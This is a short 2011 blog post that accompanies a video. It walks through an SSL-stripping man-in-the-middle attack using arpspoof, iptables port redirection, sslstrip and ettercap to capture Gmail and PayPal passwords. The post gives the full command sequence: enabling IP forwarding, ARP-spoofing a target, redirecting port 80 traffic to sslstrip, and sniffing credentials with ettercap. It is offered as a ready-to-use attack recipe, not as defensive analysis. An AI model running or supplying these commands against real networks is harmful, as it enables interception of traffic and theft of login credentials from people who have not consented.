Friday, January 21, 2011

Stripping SSL & Sniffing HTTPS (SSLStrip)


Watch video on-line:

Download video:


What is this?

This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.

How does this work?

> Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.

> Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.

> SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.

> ettercap then picks out the username & password.

What do I need?

> sslstrip

> arpspoof

> ettercap

*all in BackTrack 4 Pre Final*

Network Setup:

Targets IP:

Gateway :


Name: sslstrip

Version: 0.2

Home Page:

Download Link:

Name: arpspoof (DSniff)

Version: 2.3

Home Page:

Download Link:

Name: ettercap

Version: 0.7.3
Home Page:

Download Link:


kate /etc/etter.conf
>*uncomment redir_command_off in the iptables, linux section*
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0

Forum Post:

 thanks ~g0tmi1k

No comments:

Post a Comment